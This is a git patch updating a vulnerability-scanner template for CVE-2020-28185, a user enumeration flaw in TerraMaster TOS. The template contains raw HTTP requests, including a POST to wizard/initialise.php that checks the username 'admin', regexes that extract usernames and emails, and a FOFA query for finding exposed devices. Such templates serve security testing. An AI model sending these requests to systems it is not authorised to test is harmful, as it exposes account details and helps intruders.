From d836e594adac616198aaae9f45abff792f45b490 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran <leedhiyanesh@gmail.com>
Date: Wed, 9 Aug 2023 13:08:58 +0530
Subject: [PATCH] fix template

---
 http/cves/2020/CVE-2020-28185.yaml | 13 ++++++-------
 1 file changed, 6 insertions(+), 7 deletions(-)

diff --git a/http/cves/2020/CVE-2020-28185.yaml b/http/cves/2020/CVE-2020-28185.yaml
index 305c9a9c91..fa96180314 100644
--- a/http/cves/2020/CVE-2020-28185.yaml
+++ b/http/cves/2020/CVE-2020-28185.yaml
@@ -4,24 +4,23 @@ info:
   name: TerraMaster TOS < 4.2.06 - User Enumeration
   author: pussycat0x
   severity: medium
+  description: |
+    User Enumeration vulnerability in TerraMaster TOS <= 4.2.06 allows remote unauthenticated attackers to identify valid users within the system via the username parameter to wizard/initialise.php.
   reference:
     - https://github.com/Threekiii/Awesome-POC/blob/master/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/TerraMaster%20TOS%20%E7%94%A8%E6%88%B7%E6%9E%9A%E4%B8%BE%E6%BC%8F%E6%B4%9E%20CVE-2020-28185.md
     - https://nvd.nist.gov/vuln/detail/CVE-2020-28185
+    - https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
   metadata:
     max-request: 1
     verified: true
     fofa-query: '"TerraMaster" && header="TOS"'
-  tags: tamronos,enum
+  tags: cve,cve2020,tamronos,enum,tos
 
 http:
   - raw:
       - |
         GET /tos/index.php?user/login HTTP/1.1
         Host: {{Hostname}}
-        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/115.0
-        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
-        Accept-Language: en-US,en;q=0.5
-        Accept-Encoding: gzip, deflate
 
       - |
         POST /wizard/initialise.php HTTP/1.1
@@ -29,7 +28,7 @@ http:
         Accept-Encoding: gzip, deflate
         Content-Type: application/x-www-form-urlencoded; charset=UTF-8
         X-Requested-With: XMLHttpRequest
-        Referer: {{BaseURL}}/tos/index.php?user/login
+        Referer: {{RootURL}}/tos/index.php?user/login
 
         tab=checkuser&username=admin
 
@@ -53,4 +52,4 @@ http:
         part: body_2
         regex:
           - '"username":"(.*?)"'
-          - '"email":"(.*?)"'
\ No newline at end of file
+          - '"email":"(.*?)"'